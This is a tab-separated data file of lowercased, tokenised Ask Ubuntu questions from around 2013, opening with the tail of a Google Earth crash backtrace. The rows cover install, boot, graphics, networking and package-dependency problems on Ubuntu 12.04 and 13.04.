0x7f71486eda6a ] ./librender.so ( _zn5earth6render12renderwindow12createwidgetev+0x17c ) [ 0x7f71486dcd6c ] ./libgoogleearth_free.so ( _zn5earth6client12modulewidget9showeventep10qshowevent+0x86 ) [ 0x7f7150f5bfc6 ] ./libqtgui.so.4 ( _zn7qwidget5eventep6qevent+0x599 ) [ 0x7f7150083299 ] ./libqtgui.so.4 ( _zn19qapplicationprivate13notify_helperep7qobjectp6qevent+0xac ) [ 0x7f715002c49c ] ./libqtgui.so.4 ( _zn12qapplication6notifyep7qobjectp6qevent+0x20f ) [ 0x7f715003473f ] ./libqtcore.so.4 ( _zn16qcoreapplication14notifyinternalep7qobjectp6qevent+0x8c ) [ 0x7f714e35ca6c ] ./libqtgui.so.4 ( _zn14qwidgetprivate11show_helperev+0x12a ) [ 0x7f71500852ca ] ./libqtgui.so.4 ( _zn14qwidgetprivate12showchildreneb+0xb1 ) [ 0x7f71500850e1 ] ./libqtgui.so.4 ( _zn14qwidgetprivate11show_helperev+0x3f ) [ 0x7f71500851df ] ./libqtgui.so.4 ( _zn7qwidget10setvisibleeb+0x1aa ) [ 0x7f71500855da ] ./libqtgui.so.4 ( _zn14qwidgetprivate12showchildreneb+0x146 ) [ 0x7f7150085176 ] ./libqtgui.so.4 ( _zn14qwidgetprivate11show_helperev+0x3f ) [ 0x7f71500851df ] ./libqtgui.so.4 ( _zn14qwidgetprivate12showchildreneb+0xb1 ) [ 0x7f71500850e1 ] ./libqtgui.so.4 ( _zn14qwidgetprivate11show_helperev+0x3f ) [ 0x7f71500851df ] ./libqtgui.so.4 ( _zn7qwidget10setvisibleeb+0x1aa ) [ 0x7f71500855da ] ./libqtgui.so.4 ( _zn14qwidgetprivate12showchildreneb+0x146 ) [ 0x7f7150085176 ] ./libqtgui.so.4 ( _zn14qwidgetprivate11show_helperev+0x3f ) [ 0x7f71500851df ] ./libqtgui.so.4 ( _zn14qwidgetprivate12showchildreneb+0xb1 ) [ 0x7f71500850e1 ] ./libqtgui.so.4 ( _zn14qwidgetprivate11show_helperev+0x3f ) [ 0x7f71500851df ] ./libqtgui.so.4 ( _zn7qwidget10setvisibleeb+0x1aa ) [ 0x7f71500855da ] ./libqtgui.so.4 ( _zn14qwidgetprivate12showchildreneb+0x146 ) [ 0x7f7150085176 ] ./libqtgui.so.4 ( _zn14qwidgetprivate11show_helperev+0x3f ) [ 0x7f71500851df ] ./libqtgui.so.4 ( _zn7qwidget10setvisibleeb+0x1aa ) [ 0x7f71500855da ] ./libqtgui.so.4 ( _zn14qwidgetprivate12showchildreneb+0x146 ) [ 0x7f7150085176 ] ./libqtgui.so.4 ( _zn14qwidgetprivate11show_helperev+0x3f ) [ 0x7f71500851df ] ./libqtgui.so.4 ( _zn7qwidget10setvisibleeb+0x1aa ) [ 0x7f71500855da ] ./libqtgui.so.4 ( _zn14qwidgetprivate12showchildreneb+0x146 ) [ 0x7f7150085176 ] ./libqtgui.so.4 ( _zn14qwidgetprivate11show_helperev+0x3f ) [ 0x7f71500851df ] ./libqtgui.so.4 ( _zn7qwidget10setvisibleeb+0x1aa ) [ 0x7f71500855da ] ./libqtgui.so.4 ( _zn7qwidget10shownormalev+0x3d ) [ 0x7f7150076c0d ] ./libgoogleearth_free.so ( _zn10mainwindow18readscreensizeinfoev+0xbc5 ) [ 0x7f7150f58855 ] ./libgoogleearth_free.so ( _zn5earth6client11application12setupmainwinens0_3kvw7producteb+0x323 ) [ 0x7f7151004c03 ] ./libgoogleearth_free.so ( _zn5earth6client11application3runev+0x700 ) [ 0x7f715100b6d0 ] ./libgoogleearth_free.so ( +0x238182 ) [ 0x7f7150f7b182 ] ./libgoogleearth_free.so ( earthmain+0x1dc ) [ 0x7f7150f7b38c ] /lib/x86_64-linux-gnu/libc.so.6 ( __libc_start_main+0xf5 ) [ 0x7f715158eea5 ] ./googleearth-bin [ 0x4008b9 ]
296721	13.04 sluggish after installation , live-cd was fast	i just installed a fresh 13.04 on my macbook , but after the installation it 's a bit sluggish . several problems occur : in chromium and firefox , on google.com , the autocomplete search bar lags . sometimes it takes over 2s for the typed characters to actually appear . sometimes right-click menus ( for instance on the desktop ) take over a second to open . applications are sometimes slow to resize . the keyboard stalls every now and then , just a short while ( probably less then a minute ) , but it is annoying . scrolling on some webpages stalls . moving windows around is slow sometimes . none of these symptoms occur on the live-usb stick . i checked to see if i 've got the right graphics drivers installed , which appears to be the case . the machine is a macbook air mid 2012 . i really do n't know what to do next . edit : only weird thing i can find on the system is the fact that the installer choose to use lvm for the root partition , while there is only one disk . no idea if this is normal ?
296724	empathy does n't connect to facebook accout	in system settings > > online accounts when i add facebook account it redirects me to the browser and opens a webpage in the photo below and do nothing after that any help ? ?
296729	unknown usb flash drive	suddenly my kingston datatraveler 8gb is shown as unknown ! the weird thing is that i can only `` see '' it through disk utility . gparted or sudo fdisk -l or sudo fdisk -lu can not see it . i tried to format the entire drive as master boot record but i get an error saying error creating partition table : helper exited with exit code 1 : in part_create_partition_table : device_file=/dev/sdc , scheme=0 ped_device_get ( ) failed the only way to be formatted is to select do n't partition . if i then try to partition the volume in ext4 i get the error error creating file system : helper exited with exit code 1 : helper failed with : mke2fs 1.41.11 ( 14-mar-2010 ) mkfs.ext4 : device size reported to be zero . invalid partition specified , or partition table was n't reread after running fdisk , due to a modified partition being busy and in use . you may need to reboot to re-read your partition table . if i try to format the volume in ntfs i get the error error creating file system : helper exited with exit code 1 : helper failed with : /dev/sdc is entire device , not just one partition . refusing to make a filesystem here ! if i select empty nothing happens , but it is still registered as unknown . any ideas on how to fix it ? i do n't really care about the data ; i just need my usb flash back !
296734	bzcat to delete compressed file	by default , bzcat ( or , equivalently , bzip2 -dc or bunzip2 -c ) will keep the source ( compressed file ) and not delete it . is there a flag or other means ( besides thereafter manually rming the file ) to delete the compressed file when using bzcat or one of its equivalent commands ? ( the reason i want to do this — in case you 're wondering — is that i wish to sed-modify the output for immediate use after teeing the unmodified output to a file . i can of course instead bzcat | sed ; bunzip2 , but that requires two decompressions . any other solution for my actual problem is certainly welcome in lieu of an answer to the question i pose above . )
296740	how to launch application not from console in ubuntu touch	i 'm developing application with ubuntu touch . i use qml and c++ plugin . i can launch the application from console using `` qmlscene -i ./imports myapp.qml '' , but when i add new desktop file , wherein i write it must run my bash script , launching application , it not working . i see just white screen , when i push the button . if i launch pure qml application , all works well . i think problem is in my c++ plugin . i want to launch my application directly from phone , without use of adb or ssh in my desktop . could anyone help , please ?
296741	how to create the minecraft launcher button ?	i am trying to run a small minecraft server via ubuntu desktop 12.04 for my kids . i got minecraft installed and running , but do n't want to run via the terminal all the time . i 'm trying to pin a minecraft button to the launcher and am running into trouble . here 's what i 've tried : main menu ( alacarte ? ) but ca n't find the icon anywhere ; ca n't drag it from the main menu list either . when that did n't work , i tried creating minecraft.desktop & minecraft.sh files . i was able to download and get a .png file on the launcher but it wo n't launch anything . here 's a rundown of all the commands and scripting i 've done : terminal script that does work : sara @ sara-dimension-4300 : ~ $ cd /home/sara/mcserver sara @ sara-dimension-4300 : ~/mcserver $ java -xmx1024m -xms1024m -jar minecraft_server.jar nogui '' main menu '' command script : java -xmx1024m -xms512m -xincgc -jar /home/sara/mcserver/minecraft.jar minecraft.sh script : # ! /bin/bash cd $ ( home/mcserver `` $ 0 '' ) java -xmx1024m -xms512m -cp minecraft.jar net.minecraft.launcherframe minecraft.desktop script : [ desktop entry ] name=minecraft comment= exec=/home/sara/mcserver/minecraft.sh icon=/usr/share/icons/minecraft_block.svg terminal=false type=application startupnotify=true all files are stored in the mcserver folder . when i open the folder on launcher , it starts at home -- then mcserver is one of the folders within home ( i do n't see `` sara '' as a subdirectory of home here -- sometimes i see it when accessing other files somewhere ) . @ edwin : here 's the copy of la /home/sara sara @ sara-dimension-4300 : ~/mcserver $ la /home/sara .bash_history examples.desktop .iceauthority .profile .bash_logout .fontconfig .java public .bashrc .gconf .local .pulse .cache .gnome2 mcserver .pulse-cookie .config .goutputstream-kiz8ww minecraft.desktop~ templates .dbus .goutputstream-qxyaxw minecraft.png .thumbnails desktop .goutputstream-uzysww .mission-control videos .dmrc .gstreamer-0.10 .mozilla .xauthority documents .gtk-bookmarks music .xsession-errors downloads .gvfs pictures .xsession-errors.old
296743	problems with my graphiccard radeon hd 7770	i have a lot of problems with my radeon hd 7770 . i 'm using the xorg-driver but my system runs slow anyways . also i have a lot of graphical artifacts like black borders and stuff like that . thats how it looks when i turn on the hiding of the dashbar . could someone just help me to install the perfect driver ?
296750	move window controls of maximised window to right	i can move my window controls from following this and this discussion from askubuntu.com . normal window controls do work fine . however maximized windows do n't seem to follow this rule . when window is maximized from normal state to maximized state , window controls is shown at the default top-left position . switching between different behavior for maximized window and normal window is often confusing and is a real pain . so my question is is this a behavior by design ? is there a workaround to move window controls of maximized window to right ? i 'm using 13.04 version of ubuntu
296752	non responsive black screen when trying to install ubuntu 13.04 from usb or cd	i just bought at hp pavilion p6-2350 with an amd hd 7560d . it came with windows 8 . i burned the ubuntu 13.04 iso to a dvd , reset the computer , had to redo the boot order for the cd to start before windows . it came up with options to install , try before installing , or oem something . when i install or trial , it goes to a complete black screen . so i tried editing on that page by pressing 'e ' and replacing 'quiet splash ' with 'nomodeset ' , and the same thing happened . i then installed the recommended usb installer , installed ubuntu onto it , restarted and found the same result . i 'm at a loss here on how to install ubuntu .
296754	problem when connected through rdp to xrdp in ubuntu current windows open arent show	when i remote access into my computer through rdp using xrdp on my linux machine , i can not see the last opened windows that i left when i login through other computer to my home computer . instead it just gives me a fresh starting desktop with none of my previous windows and app running . for example , if i had firefox open , when i remote login i ca n't see the firefox window open . where is my open windows and running apps ? anyone run into this ? or know how to fix it ?
296756	alternatives to rhythmbox to record streaming audio	i always have been able to record streaming radio using rhythmbox , until now . as already reported , there is a bug with 13.04 . i tried banshee . there is also a bug with that , which has been reported . is there any audio player out there that can record internet radio and make each song an .mp3 ? i have tried vlc ( can make one file as far as i can tell ) , streamripper2 , clementine and audacious . streamripper2 works but does not have the stations i want . i really like 13.04 , except for this issue . it is faster than 12.10 and 12.04 and i had no issues installing the video card driver , so my preference is to stay with 13.04 . i seem to have hit a dead end on various websites looking for an alternative . does anyone have an idea ? much obliged !
296760	how to install windows 7 in virtualbox from ubuntu 13.04 ?	shortly after i installed ubuntu 13.04 , i installed virtualbox in order to use windows 7 in a virtual machine . when trying to install windows i get the following : can not find a driver for the cd/dvd drive . if you have a cd , dvd or usb flash drive that could have the driver , insert it now . note : if the installation media of windows is in the cd or dvd drive , you can safely remove it to do this step . my drive is named hl-dt-st dvd-ram gh22ns30 ( sr0 ) . click on the image to open a full-resolution version
296761	create unity launcher for file	how do you create a launcher for a file in unity ? i am currently trying to create a launcher for the side panel in unity that , when clicked , opens an executable file in my home directory . is there any way to do that ? thanks in advance
296763	software updater log 13.04	i ran the software updater and noticed a message which indicated that my system may be broken and to run a certain command to fix it . of course i missed the command and even more strange , the software updater indicated all updates were installed . to no avail , i have been perusing various logs trying to find the problem and the specific command software updater indicated i should run . can someone point me in the right direction as to how to find this error and the fix that was suggested ? thanks !
296764	mysql5.6 and problem of php5-mysql , mysql-common packages	i install mysql 5.6 with this documentaion ( in ubuntu 13.04 ) , now i need to install php5-mysql and mysql-common packages . can i install them with apt-get ? i think they will install mysql5.5 compatible , may some error occure ! how can i do ?
296767	lenovo g780 and ubuntu 13.04	just installed 13.04 on new g780 , left uefi enabled , but wiped windows 8 off the disk . whenever i boot up 13.04 , the screen shows purple for a few seconds , and then just the back light shows for a few more seconds , and then the screen goes black with no back light . while it is booting , i have to press the function key and hold it while i press the up arrow key , which increases the back light enough so i can see the ubuntu splash screen . when it is done booting i can increase the back light fully with the scale showing in the upper right corner . not a big problem , but just kind of annoying . ps booting ubuntu 12.10 worked great , but no wired internet . booting 12.04 worked the same as 13.04 with a black screen . formatted the 1tb disk with 5 partitions , 1=uefi , 2=root , 3=var , 4=home , 5=swap
296768	ubuntu 13.04 works on a uefi pc ?	can ubuntu 13.04 works on a uefi pc ? or i 've to modify the uefi & boot partitions ?
296779	ubuntu and windows7	i know , this is a stupid question but i need your help . i have ubuntu 12.04 on my computer but i need windows to play metin2 ( yes i need because i am gamemaster ) . wine does n't work because of hackshield 's error 108 ( no fix found ) . ok . so when i installed ubuntu , i have selected just a half of my hdd ( the rest is unformated/free . now , when i install windows , the grub loader will be owerwritten by windows bootloader ... right ? i need all my files and do n't want to loose this installed ubuntu because of skype ( it took 2 days to configure the sound and my external microphone ) . do somebody know how to install grubloader after the windows installation ? or can me somebody give me step-by-step instructions to install windows ? i 'm newbie and this is asked many times but i found just how to install ubuntu after windows or problem with windows installation . please help me . thank you !
296783	completely separate full screen opengl context on second monitor	for a 3d scanner implementation i need to precisely control the output of a projector connected as a second monitor to my graphics card . i would need to issue opengl commands in a full screen context on this second monitor using a second x server instance . i am on ubuntu 13.04 with a dell precision t3600 workstation containing a amd v7900 gpu . how do i get one x server with unity on the main screen and a second x server instance for the projector which contains only a fullscreen opengl context ?
296789	how do i run ubuntu from disk	i am unable to boot from the disk i burned of the image i downloaded from the ubuntu website . i 've gone into setup and rearranged boot sequence and i 've looked through disk for executable files . i found only one , wubi.exe , but it wants to install . i only want to run ubuntu from the disk .
296792	ubuntu 13.04 hdmi resolution and display options incorrect	i have installed ubuntu 13.04 and the hdmi resolution is incorrect and options limited to a max of 1280x720 . the vga is not perfect as it is cutting off the top taskbar slightly , it also shows a resolution of 1360x768 instead of 1366x768 . system specs : intel celeron 847 , nm70 chipset with integrated graphics . the display is my 32 '' samsung lcd tv with a max resolution of 1366x768 . in the display options it is picking up the incorrect display information . the vga output displays a 19 '' while the hdmi picks up a 7 '' . i have read in a fourum that it has to do possible with incorrect edid information from the display and you need to change the xorg.conf file with the line : option `` useedid '' `` false '' but 13.04 does n't come with an xorg.conf file anymore ? is this the correct and best way to resolve this and if so how ?
296793	remotely control ubuntu server from ubuntu laptop over my phones wifi hotspot ?	i need to be able to control my home ubuntu server while im at work using my ubuntu laptop over my phone 's wifi hotspot . speed is n't an issue , it 's the same as my home dsl . ive been using chrome remote desktop in windows but would rather not have to dual boot .
296794	where should i install windows ?	here is a picture of `` gparted '' . where should i install windows ( which partition ? ) ? it 's sda1 ? i 'm not sure because there are 20gb in use and i do n't know why . it 's possible that 's the older version of ubuntu ? i chosen in ubuntu installer to install ubuntu 12.04 next to ubuntu 13 but i 'm not sure .
296797	ubuntu black screen	i am trying to install ubuntu 13.04 64bit on my new asus machine . my graphics card in an intel hd graphics 4000 card . i am trying to install ubuntu but when i boot with flash drive and click install , the screen just goes black . i tried replacing quiet splash with nomodeset and radeon.modeset=0 but nothing works . i am also confused because when i click to edit there are only like 3-4 lines of code . should there be more ? cntl+x does not do anything . if i hit f10 , it just goes back to the black screen . can anyone please help me ?
296799	wubi + multiple windows installations	i have a question about the windows installer : http : //www.ubuntu.com/download/desktop/install-ubuntu-with-windows if today i have two distinct windows xp installations ( one in english and one in russian ) and when i boot up , i can choose between the english and russian installation , will i be able , after installing the ubutnu windows installer , to select between english/russian and linux ?
296801	about : blank opens in chromium when i type into the dash	here 's a rather odd problem i 'm having . whenever i open the dash and type into it , chromium opens up and opens an `` about : blank '' tab for just about every letter i write into the dash . why is it doing this and how do i stop it from doing this ?
296830	install postgresql . unmet dependencie `` postgresql-common ''	i 'm trying to install postgis on ubuntu 13.04 . i 've attempted to follow a number of different blogs and wikis on line , but always run in to the same problem ... $ sudo apt-get install postgis postgresql-9.1-postgis ... . package postgresql-9.2-postgis is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'postgresql-9.2-postgis ' has no installation candidate so i try 9.1 ... $ sudo apt-get install postgis postgresql-9.1-postgis ... . the following packages have unmet dependencies : postgresql-9.1-postgis : depends : postgresql-9.1 but it is not going to be installed e : unable to correct problems , you have held broken packages . no luck , so i go looking for postgresql-9.1 ... sudo apt-get install postgresql-9.1 ... some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : postgresql-9.1 : depends : postgresql-common ( > = 115~ ) but it is not going to be installed e : unable to correct problems , you have held broken packages . so postgresql-common then ? sudo apt-get install postgresql-common some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : postgresql-common : breaks : logrotate ( > = 3.8 ) but 3.8.3-3ubuntu2 is to be installed e : unable to correct problems , you have held broken packages . anyone know what to do ?
296832	canâ´t install phpmyadmin	i tried to install phpmyadmin by running : sudo apt-get install phpmyadmin but i got the error message that phpmyadmin can not be found . i found the notice to activate the universe repository in my software sources , but i still got the same error message . how can i install phpmyadmin ?
296833	realtek rtl8188ce network adapter repeatedly drops connection	variations of this problem certainly seem to be common , but i 'm not not seeing a recent solution for my case : i 'm running ubuntu 13.04 , uname -r = 3.8.0-21-generic lspci = 02:00.0 network controller : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter ( rev 01 ) the wifi network connection is relatively slow , but more seriously , repeatedly drops completely every few minutes . it usually recovers in a minute or so , but then drops again in 1-3 minutes . running windows 8 ( ugh ) on the same system , the connection never drops . some of the solutions proposed , involve compiling/installing a new driver from realtek - i 'm really not comfortable doing that . another suggested adding a /etc/modprobe.d/rtl8192.conf file containing a `` options rtl8192ce ips=0 debug=2 '' line . i tried that - no effect . another solution proposed deleting the network manager and installing something called `` wicd '' . i have n't tried that yet , wondering , if `` wicd '' did n't help/work , could i use apt-get to purge it and re-install the network manager to get back to where i am ? suggestions ?
296839	binary is whitelisted installin from live-cd win8	i 'm trying to install ubuntu 12.04.2 64bit on a asus k55n running a preinstalled win8 . the bios ( of uefi o this computer ) are set to load from uefi usb device , the fast boot is disabled and the `` launch csm '' that is a similar to secure booting is also disabled . the grub window opens ( gnu grub version 1.99-2 ubuntu3.9 ) with the regular 3 options ( try with out install , install , check disk for errors ) but any option i choose spit a `` binary is whitelisted '' , and stop there without booting . i 've look in the ubuntu forum for answers but ( even if quite a few asus owner have the similar problems ) , but as nothing boots i can not change nomodeset or grub parameters . i 'm really stuck and none af the many posts i read on the subject seems to be usefull ... thank you really much to anyone that can help , cri
296844	proxy chain application	please recommend proxy chain application for ubuntu like proxifier . proxifier support proxies in https and socks . i want an application like proxifier for ubuntu .
296848	can i boot a password for my ubuntu while booting	i saw it on my friend 's laptop when the laptop is booting and this screen below appears , the device does n't complete booting until he put a password can any one help me if he knows the way ?
296849	installing ubuntu on a gpt hdd	i have changed my system to boot from uefi instead of bios and have installed windows 7 on my internal ssd which has gpt partition type . i am trying to install ubuntu 13.04 on my external hdd . my machine is a lenovo w520 . my hdd is a 1tb usb3 wd . here is some of what i have been trying : my laptop is set to boot in uefi mode . i have 64 bit version of ubuntu , on my bootable flash disk i took out my ssd before installing ubuntu before installation my external hdd was also partitioned as gpt and it only had one 950gb partition i tried two different methods : first : when i let the ubuntu to install itself automatically , without changing anything , the installation completed but ubuntu did not boot . ssd was out and i am sure the systems boots in uefi mode . second : i tried to do the partitioning myself in the following order , but i still have the same problem , i am sure my hdd is partitioned as gpt : /efi boot / ( root ) /swap /home i chose to install the bootloader in /efi boot . please let me know what i am doing wrong . thanks update : i was sure that windows , on ssd , boots in uefi mode . however , i disconnected my hdd and the windows did boot from ssd.i used the live usb to boot ubuntu and let it do the partitioning and install ubuntu on the external hdd . i still had the same problem and ubuntu did not boot . then i used the live usb and installed boot-repair . after running boot-repair and a restart everything was good , and ubuntu did boot from hdd . however , there is a line before booting into ubuntu : ata_id [ 279 ] : hdio_get_identity failed for '/dev/sdb ' : invalid argument but the system boots . boot info script : here is a boot info script i got after using boot repair . i tried to change the partitioning and partition sizes . after reading here , i changed the partitioning using gparted . i also installed the bootloader in /dev/sda1 which is flagged as the /boot partition . as expected after installation and a reboot , ubuntu did not boot . so by following this and this posts , i tried to register the bootloader to the efi . but i was not successful . i even noticed that my machine might have this problem , and i changed the /efi/ubuntu/bootx64.efi name and location but no effect , ubuntu did not want to boot . again , i used boot repair to solve the boot problem and it worked like the previous time and i am in ubuntu . but i really like to know what is causing this problem . the interesting thing is that boot repair has created all possible folders and files . is there a way that i know which folders are being used for boot ? these are the different folders and files : -/boot/efi/efi/boot/bootx64.efi -/boot/efi/efi/microsoft/boot/bootmgfw.efi and bootx64.efi -/boot/efi/efi/ubuntu/bootx64.efi and grubx64.efi
296851	sublime text 2 typing problem	i use ubuntu 12.04 . recently i installed sublime text 2 and registered . whenever i open a large file , the 'backspace ' button of my keyboard does n't work . but after selecting the text i can delete them with the 'backspace ' button . but if the file is smaller then there is no problem . what is the problem with the sublime text 2- could anyone please help me ?
296857	active windows moved to secondary screen	ok. help . i use my 13.04 system frequently when teaching . everytime i connect the beamer , all the active windows ( and desktop files ) are moved to the secondary screen . this becomes really annoying after a while , as i am continuously flashing my notes ( and anything embarassing i might have open , including , say , personal emails ) on the beamer screen . how can i make sure windows and files remain on the primary screen unless i drag them over to the secondary screen ? the displays function in system settings does not solve this problem . or maybe i am doing something wrong .
296861	moonlight-mono for raring 13.04 ?	is there a method or location to install moonlight on ubuntu raring 13.04 ?
296866	can not do fresh install of ubuntu 13.04 while booting from dvd : `` soft lockup '' bug	hello ubunutu community ! i 'm trying to do fresh install of ubuntu 13.04 to completely replace windows 7 . i downloaded 32 bit version of ubuntu 13.04 from this website , burned the image to dvd ( i made sure it was burned properly ) , and then restarted to boot from the dvd . it booted , i could see the [ `` person '' = `` keyboard '' ] symbol , but after about 20 seconds i got the following bug : bug : soft lockup - cpu # 0 stuck for 23s ! [ modprobe : 226 ] the number of cpu , number of seconds and number of probe change every time i restart the computer and try to boot . the `` bug '' line is followed by a bunch of information . that information is followed by a line that looks something like the following ( this line is repeated over and over ) : udevd [ 185 ] : timeout : killing '/sbin/modprobe -bv pci : v000010ded000006e9sv000017aasd00002107bc03sc00i00 ' [ 226 ] afterwards , the `` bug '' line reappears , and the process goes on perpetually . this is happening on my lenovo sl 400 laptop . i had ubuntu 12.04 in the fall of 2012 ( installed it by using wubi ) , but then i removed it to have only windows 7 due to limited hard drive space . thank you for any and all help ! it is much appreciated !
296875	lync attendee meetings on ubuntu ?	i need to join microsoft lync attendee online meetings , mostly as a participant ( not host ) . is there a way i can configure lync attendee , or preferably another open source client to do the same ? note : although i do need lync support and appreciate the help , the question here is about the lync attendee ... .their online audio/video conferencing client .
296879	i can not access my files and other data which is in ubuntu installation drive	i am using windows7 and before few days ago i was installed ubuntu . my hard drive have 3 partitions . in one part windows7 installed and in another part ubuntu was installed . now my problem is that i can not access data which is available on the ubuntu partition . how can i access that data ?
296886	how do i create a path shortcut ?	i have a very beginner question . i would like to create a shortcut to a directory that is global so that when i do something like cd $ dir it will take me to the specified directory . or if i am prompted to specify a download path in some program i can just input $ dir into the field . thanks
296894	external monitor is too yellow	when i bought a new screen ( philips 227e4l ) and connected it with my laptop ( hp compaq 6520 ) via the vga port , the size of screen is right ( 1920x1080 ) , but the color is wrong ( too much yellow ) . how can i adjust the color of the screen ?
296896	where do ltsp user accounts need to reside ?	i 've looked at the fan club ltsp install articles , but i can not tell if the user accounts for my ltsp users need to reside only on the ltsp image . i believe that is the case , and i 've added them there , but when i update the image and try to connect , it 's failing and it restarts and asks for the login again . it 's really wierd because i can ctrl+alt+f1 to pull up a terminal and log in with the credentials just fine . i 'm trying to set up thick/fat i386 clients under ubuntu 12.04 lts 64 bit . oh , another bizarre item -- i can login with my credentials under ldm on the ltsp client and it works fine . can someone tell me : do ltsp user acounts need to exist on the server ? if not , how does it map back to a home folder on the server ? whats the relationship between the users and groups on the server with those on the clients ? it looks like the update image process does something with them . does ldm use ssh , and if so which ssh server is it talking to ? the one on the server or the one on the ltsp client ? thanks . i 've googled my eyes out and rtfm 'd until my head hurts .
296897	what are the default login credentials for tiny tiny rss ?	i followed this article to install tiny tiny rss on my ubuntu machine . everything went well , but when i try to go to http : //localhost/tt-rss/ it asks for the username and password . which username and password should i enter here , it did n't ask me to create one during installation ?
296898	problem with idm integration	i have installed the idm in ubuntu through wine . when i integrate idm with chrome i had select the `` use advanced browser integration '' in option . when i select that , a new window opens that have a problem . but i did right about the three problems . idm can not engage advanced browser integration because of any of the following reasons : you do n't have admin rights or you did n't allow idm helper program to execute as admin . you pressed `` cancel '' button during idm network driver installation . you blocked idm network driver startup or installation by means of the third party security or antivirus .
296907	compiling ekiga from source	i 'm compiling ekiga from source . apparently i have installed all the necessary dependencies because i do n't get any errors when running ./configure . there is one feature that i ca n't seem to enable however . the output from ./configure shows mdns/dns-sd support : disabled is there a missing dependency that i should install to enable this feature ?
296908	i ca n't see the `` something else '' option while installing ubuntu	few days ago , i was updating my ubuntu from 12.10 , to 13.04 , but unfortunately my pc did turn off with no reason ( i actually had problems with that by lasted days , but it does n't matter ) and now , when i loaded ubuntu and logged in , i had clear desktop , could n't do anything . so i downloaded installer and booted it with usb and i have a problem ... there is no option such as `` update existing ubuntu partition '' , only `` install next to windows 7 '' , `` install instead windows 7 '' and `` use another option '' . and my question is ... how do i update my ubuntu ? i have my really , really needed stuff in there ( cms that i were working on by 2 months ) . is there any option , so i will install ubuntu without loosing my files ?
296910	ubuntu 13.04 teamviewer 8 cant connect	i have 64bit teamviever 8 ver 8.0.17147 wine-1.5.19 installed on a ubuntu 13.04 desktop and i can launch the app and make connections out to other computers without any problems . when i try connecting to my ubuntu client from any of my other windows machines with a teamviewer client or my android client , it just hangs at connecting and never connects . i have tried both the 32bit and 64bit clients and they both will not allow an inbound connection . any help would be great ... thanks cj
296913	what is the type of my kernel , 32 bits or 64 bits ?	four commands on my pc : $ dpkg -l |grep linux-image linux kernel image for version 3.4.0 on 32 bit x86 smp it means my ubuntu kernel is 32 bits ? $ uname -a linux ny 3.4.0-030400-generic # 201205210521 smp mon may 21 09:22:02 utc 2012 **x86_64 x86_64 x86_64** gnu/linux $ file /bin/ls /bin/ls : elf 64-bit lsb executable , **x86-64** , version 1 ( sysv ) , dynamically linked ( uses shared libs ) , for gnu/linux 2.6.24 , buildid [ sha1 ] =0x37cdd635587f519989044055623abff939002027 , stripped $ file /sbin/init /sbin/init : elf 64-bit lsb shared object , **x86-64** , version 1 ( sysv ) , dynamically linked ( uses shared libs ) , for gnu/linux 2.6.24 , buildid [ sha1 ] =0x7aa29ded613e503fb09fb75d94026f3256f01e7a , stripped up 3 commands mean my kernel is 64 bits ? my question : what is my kernel , 32 bits or 64 bits ? thanks .
296914	how do i update from 12.4 to 13.04 ? ? macbook alu 2008	i ca n't figure out how to update from 12.04. to 13.04.. i have tried to run update manager , and it says that there nothing to update .
296915	how to repair deleted modules ?	during a disk analyzer session to clean up space , i saw that /lib was taking up a ton of space , and i have never before seen this taking up this much space before in disk analyzer . the thing is , i have recently made a /lib folder under my /home/development for building some android kernels . so when i looked at this and not having seen it like this before , i thought i was looking at my /lib folder for my android kernels . i did n't even take a second to look at the hierarchy before going into it and pulling it up in terminal , i was just set on removing what was taking up excessive amounts of space . when i saw how much space was being taken up , my thinking just went to - `` remove . '' so i went into the lib folder and deleted all the old ones . i do n't remember the whole names exactly but i do remember there were ones from i believe 29 and up , in .0-29-generic-pae , and all the way up to forty . i normally do n't mess around in these folders , especially deleting things , only adding things i may need for android development . i accidentally deleted all my modules from /lib/modules now my ubuntu boots and runs and i have access to all my system , but i have no modules . regression : i have no drivers , which means i ca n't connect my external hdd where i copied .0-40-generic-pae to , and i ca n't connect to the internet to download the modules . the accidentally deleted modules are n't in my trash because i used rm -r , so no restoring from trash . i was told to just purge my kernel and reinstall it , and that was headache free , i 'm getting a headache just figuring out how to properly do so with what i have access to . i do not want to just wipe and re-install when there could be an alternate way to fix this , possibly even easy way , because i have tons of data that i do not want to loose , and without those modules i ca n't back them up anywhere . another suggestion was to boot into a live session and download what i need , back it up ( i guess mount my current ubuntu partition and put it there ) , and then install . well i can do that , i can boot live session , plug in my external hdd , mount my ubuntu partition , and copy the 40-generic-pae modules i have to that system . i believe i can do this , correct ? would this be the way to go ? if so , should i just copy the whole folder /package straight back into /lib/modules , and then reboot ? or is there a different way i should do it ? can anyone help me with this ?
296918	how to make xfce reserve space for panel on the right monitor ?	i 'm using xubuntu 13.04 on my laptop that has an external screen attached . the big external monitor also has a vertical panel . my external screen is on the right side of my laptop . when i maximize windows on my external monitor , the panel overlaps those . however , when i maximize windows on my smaller laptop monitor , there seems to be the panel 's width reserved in space ( which is just empty ) how can i make it reserve space on the right monitor ? my setup looks like this ( generated with arandr and modified ( right-of and primary are by me , trying to solve the problem ) : # ! /bin/sh xrandr -- output hdmi1 -- primary -- right-of lvds1 -- mode 1920x1080 -- pos 1440x0 -- rotate normal \ -- output lvds1 -- mode 1440x900 -- pos 0x368 -- rotate normal \ -- output tv1 -- off -- output vga1 -- off
296921	aptitude dependency resolution issue when trying to install build-deps for openjdk-6	i am running into some kind of rather serious issue with resolving the dependencies if i try to install the build-deps for openjdk-6 , as specified in the directions for compiling custom openjdk releases , which i need to do to add special support for a crypto offloading board . i am wondering if someone else ran into a similar problem like this and found a good solution for it , it seems like these packages and their development packages are out of sync even after a proper dist-upgrade with all of the security updates , backports , etc . available for ubuntu server , lucid 10.04 . ( the jdk build instructions are here : http : //hg.openjdk.java.net/jdk6/jdk6/raw-file/tip/readme-builds.html ) . $ sudo aptitude build-dep openjdk-6 reading package lists ... building dependency tree ... reading state information ... reading extended state information ... initializing package states ... the following packages are broken : comerr-dev libgcrypt11-dev libglib2.0-dev tzdata-java the following new packages will be installed : alacarte { a } ant ant-gcj { a } ant-optional ant-optional-gcj { a } app-install-data { a } aspell { a } aspell-en { a } autoconf automake autotools-dev ca-certificates-java { a } capplets-data { a } 